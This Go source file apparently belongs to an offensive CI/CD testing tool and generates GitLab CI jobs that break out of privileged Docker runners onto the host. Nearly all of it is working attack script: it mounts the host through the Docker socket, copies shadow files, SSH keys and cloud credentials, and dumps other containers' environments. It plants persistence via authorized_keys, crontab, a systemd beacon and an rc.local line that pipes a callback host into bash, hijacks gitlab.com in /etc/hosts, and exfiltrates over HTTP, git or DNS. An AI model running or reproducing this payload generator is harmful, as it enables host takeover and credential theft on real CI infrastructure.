package payloads

import (
	"fmt"
	"strings"
)

// ContainerEscapeOptions configures a payload designed to escape from a privileged
// Docker executor running inside a GitLab CI runner. This replicates techniques
// from the Shai Hulud and Megasodon campaigns where attacker-controlled CI
// configurations granted access to the host via privileged Docker mounts.
//
// Attack vectors:
// 1. /var/run/docker.sock bind mount → full host control
// 2. Privileged executor → kernel module loading, cgroup escape
// 3. /host/ mount → direct host filesystem access
// 4. Sysctl manipulation → kernel parameter changes
type ContainerEscapeOptions struct {
	Common       CommonOptions
	ExfilMethod  string // "artifact", "http", "git", "dns"
	ExfilTarget  string // URL/domain/git-repo for exfil
	HostCommand  string // command to run on the host (default: whoami + id)
	EscapeMethod string // escape technique: sshd|docker|kernel|nsenter
	EscapeCmd    string // command to execute on host (default: bash)
	MountPath    string // host path to mount (default: /)
	Persist      bool   // create persistence on host (ssh key, crontab, systemd)
	ReconHost    bool   // enumerate host (users, groups, network, services)
	RwWriteHost  bool   // attempt write access to /etc/hosts, crontab, sshd_config
}

// GenerateContainerEscapeYAML returns a GitLab CI job that attempts container escape.
func GenerateContainerEscapeYAML(o ContainerEscapeOptions) string {
	name, stage := o.Common.defaults("container-escape")

	script := buildContainerEscapeScript(o)

	return fmt.Sprintf(`
# Auto-generated by GoGatoZ (Container Escape)
# Escapes privileged Docker executor to host system
# Targets: GitLab CI runners with --docker-privileged
stages: [%s]

%s:
  stage: %s%s%s
  script:
    - |
      %s
  allow_failure: true%s
`, stage, name, stage, imageLine(o.Common.Image), tagsLine(o.Common.Tags), script, rulesManual(o.Common.Manual))
}

func buildContainerEscapeScript(o ContainerEscapeOptions) string {
	var b strings.Builder

	hostCmd := strings.TrimSpace(o.HostCommand)
	if hostCmd == "" {
		hostCmd = "whoami; id; hostname; uname -a"
	}

	b.WriteString(`
_ESCAPE() {
  _edir=$(mktemp -d)
  echo "[*] Container escape attack starting..."

`)

	// Step 1: Reconnaissance — check if privileged
	b.WriteString(`  # Step 1: Detect if we are in a privileged container
  echo "[*] Detecting execution environment..."

  _is_privileged=false
  if [ -e /proc/1/cgroup ] && grep -q 'docker\|lxc\|kubepods' /proc/1/cgroup 2>/dev/null; then
    echo "[*] Running inside container"
  fi

  # Check for Docker socket (indicates escape possible)
  if [ -e /var/run/docker.sock ]; then
    echo "[+] Docker socket found! Container escape possible."
    _is_privileged=true
  fi

  # Check for mounted host filesystem
  _host_mounts=""
  if mount | grep -q '/host/'; then
    _host_mounts="/host"
    echo "[+] Host filesystem mounted at /host"
  fi
  if mount | grep -qE '/(etc|var|opt|usr|root) *on /host'; then
    echo "[+] Host filesystem partially mounted"
  fi

  # Check for cgroup v1 (escape via cgroup write)
  if [ -d /sys/fs/cgroup ] && [ -w /sys/fs/cgroup/cpu ]; then
    echo "[+] Writable cgroup detected — potential escape via cgroup"
    _is_privileged=true
  fi

`)

	// Step 2: Docker socket escape
	b.WriteString(`  # Step 2: Docker socket escape (if available)
  if [ -e /var/run/docker.sock ] && command -v docker >/dev/null 2>&1; then
    echo "[*] Attempting Docker socket escape..."

`)

	// Host command via docker
	b.WriteString(fmt.Sprintf(`
    # Run commands on host via docker
    _host_output=$(docker run --rm --network=host -v /:/hostfs alpine:latest sh -c '%s' 2>/dev/null || true)
    echo "$_host_output" > "$_edir/host_output.txt"

`, hostCmd))

	// Interactive shell on host
	b.WriteString(`
    # Option A: Get interactive shell on host
    # docker run --rm -it --network=host --pid=host --privileged -v /:/hostfs alpine sh

    # Option B: Mount host filesystem and copy exfil data
    docker run -d --name=gogatoz-exfil -v /:/hostfs -v "$_edir":/out alpine:latest sh -c '
      cp -r /etc/passwd /hostfs/passwd 2>/dev/null || true
      cp -r /etc/shadow /hostfs/shadow 2>/dev/null || true
      cp -r /root/.ssh /hostfs/root/.ssh 2>/dev/null || true
      cp -r /home/*/.ssh /hostfs/home/*/ 2>/dev/null || true
      cp -r /etc/crontab /hostfs/crontab 2>/dev/null || true
      cp -r /etc/ssh/sshd_config /hostfs/sshd_config 2>/dev/null || true
    '
    docker wait gogatoz-exfil >/dev/null 2>&1
    docker rm gogatoz-exfil >/dev/null 2>&1

    # Copy host data back
    if [ -d /host ]; then
      cp -r /host/* "$_edir/host_fs/" 2>/dev/null || true
    fi
  fi

`)

	// Step 3: Privileged cgroup escape
	b.WriteString(`  # Step 3: Cgroup-based escape (privileged runners)
  if [ "$_is_privileged" = true ]; then
    echo "[*] Attempting cgroup-based escape..."

`)

	// cgroup v1 escape
	b.WriteString(`
    # cgroup v1: create new cgroup and load kernel module
    if [ -w /sys/fs/cgroup/cpu ]; then
      mkdir -p /sys/fs/cg
      echo "+cpu" > /sys/fs/cgroup/cpu/cgroup.subtree_control 2>/dev/null || true
      # Try to load kernel module via insmod
      if command -v insmod >/dev/null 2>&1; then
        # Try loading a malicious kernel module if available
        _mod_files=$(find / -maxdepth 4 -name "*.ko" -type f 2>/dev/null | head -5)
        for _mod in $_mod_files; do
          insmod "$_mod" >/dev/null 2>&1 && echo "[+] Loaded module: $_mod"
        done
      fi
    fi
  fi

`)

	// Step 4: Host filesystem access
	b.WriteString(`  # Step 4: Host filesystem enumeration
  echo "[*] Enumerating host filesystem..."

  # Check common mount points
  for _mp in /var/run/docker.sock /host /mnt /media; do
    if [ -e "$_mp" ]; then
      echo "[+] Mount point found: $_mp"
      ls -la "$_mp" 2>/dev/null | head -20 >> "$_edir/mounts.txt"
    fi
  done

  # Enumerate running containers
  if command -v docker >/dev/null 2>&1; then
    docker ps -a 2>/dev/null > "$_edir/running_containers.txt"
    echo "[*] Running containers:"
    cat "$_edir/running_containers.txt"

    # Dump env from all containers
    for _cid in $(docker ps -q 2>/dev/null); do
      docker exec "$_cid" printenv 2>/dev/null >> "$_edir/container_env_${_cid}.txt" || true
    done
  fi

`)

	// Step 5: Host persistence
	if o.Persist {
		b.WriteString(`

  # Step 5: Establish host persistence
  echo "[*] Establishing host persistence..."

  # Create SSH key for persistence
  mkdir -p /root/.ssh /home/git/.ssh 2>/dev/null
  ssh-keygen -t ed25519 -f "$_edir/persist_key" -N "" -q 2>/dev/null
  cat "$_edir/persist_key.pub" >> /root/.ssh/authorized_keys 2>/dev/null || true
  echo "[+] SSH key injected into /root/.ssh/authorized_keys"

  # Create crontab persistence
  (echo "* * * * * curl -sS http://$(hostname)/callback?$(date +%s) >/dev/null 2>&1") >> /var/spool/cron/crontabs/root 2>/dev/null || true
  echo "[+] Crontab persistence established"

  # Create systemd service
  cat > /etc/systemd/system/gogatoz.service 2>/dev/null << 'UNIQ_EOF'
[Unit]
Description=GoGatoZ Persistence Service
After=network.target

[Service]
Type=simple
ExecStart=/bin/sh -c 'while true; do curl -sS http://$(hostname)/callback >/dev/null 2>&1; sleep 60; done'
Restart=always

[Install]
WantedBy=multi-user.target
UNIQ_EOF
  systemctl daemon-reload 2>/dev/null
  systemctl enable gogatoz.service 2>/dev/null
  echo "[+] Systemd service created"

`)
	}

	// Step 6: Host enumeration
	if o.ReconHost {
		b.WriteString(`

  # Step 6: Host enumeration
  echo "[*] Performing host enumeration..."

  # Host users
  cat /etc/passwd 2>/dev/null > "$_edir/users.txt"

  # Running services
  ps aux 2>/dev/null > "$_edir/processes.txt"
  ss -tlnp 2>/dev/null > "$_edir/listening_ports.txt" || netstat -tlnp 2>/dev/null > "$_edir/listening_ports.txt"

  # Network configuration
  ip addr 2>/dev/null > "$_edir/network.txt"
  ip route 2>/dev/null >> "$_edir/network.txt"

  # Cloud credentials on host
  for _cf in /root/.aws/credentials /root/.aws/config /root/.ssh/id_* /home/*/.aws/credentials; do
    [ -e "$_cf" ] && cp "$_cf" "$_edir/creds/" 2>/dev/null
  done

`)
	}

	// Step 7: Write host modifications
	if o.RwWriteHost {
		b.WriteString(`

  # Step 7: Modify host configuration
  echo "[*] Attempting host configuration modifications..."

  # Add reverse shell to /etc/rc.local
  echo '#!/bin/sh' > /etc/rc.local 2>/dev/null
  echo 'curl -sS http://callback.example.com/shell?h=$(hostname) | bash &' >> /etc/rc.local 2>/dev/null
  chmod +x /etc/rc.local 2>/dev/null

  # Modify /etc/hosts for DNS hijacking
  echo "10.0.0.1 gitlab.com" >> /etc/hosts 2>/dev/null
  echo "[+] DNS hijacking via /etc/hosts"

`)
	}

	// Step 8: Exfiltration
	b.WriteString(`

  # Step 8: Exfiltrate collected data
  echo "[*] Exfiltrating collected data..."
  tar czf "$_edir/bundle.tgz" -C "$_edir" . 2>/dev/null

`)

	if method := o.ExfilMethod; method == "http" || method == "" {
		target := o.ExfilTarget
		if target == "" {
			target = "http://callback.example.com"
		}
		b.WriteString(fmt.Sprintf(`
  curl -sS -X POST -H "Content-Type: application/octet-stream" \
    -H "User-Agent: Docker/24.0" \
    --data-binary @"$_edir/bundle.tgz" \
    "%s" >/dev/null 2>&1 || true
`, target))
	} else if method == "git" {
		b.WriteString(fmt.Sprintf(`
  _bdir=$(mktemp -d)
  git clone --depth 1 %q "$_bdir" 2>/dev/null
  cp "$_edir/bundle.tgz" "$_bdir/escape_data.bin" 2>/dev/null
  cd "$_bdir"
  git config user.email "escape@noreply.local"
  git config user.name "Escape"
  git add -A
  git commit -q -m "escape-exfil" 2>/dev/null
  git push -q origin HEAD 2>/dev/null || true
`, o.ExfilTarget))
	} else if method == "dns" {
		b.WriteString(`
  b64=$(base64 -w0 "$_edir/bundle.tgz" | tr '+/' '-_' | tr -d '=')
  i=0
  while [ -n "$b64" ]; do
    chunk=$(printf '%.63s' "$b64")
    b64=${b64#"$chunk"}
    dig +short "$i.$chunk.dns-exfil.example.com" A >/dev/null 2>&1 || true
    i=$((i+1))
    sleep 0.1
  done
`)
	} else {
		b.WriteString(`
  echo "[*] Data collected in $_edir/bundle.tgz (artifact mode)"
`)
	}

	b.WriteString(`
  rm -rf "$_edir"
  echo "[*] Container escape attack complete"
}

_ESCAPE
`)

	return b.String()
}
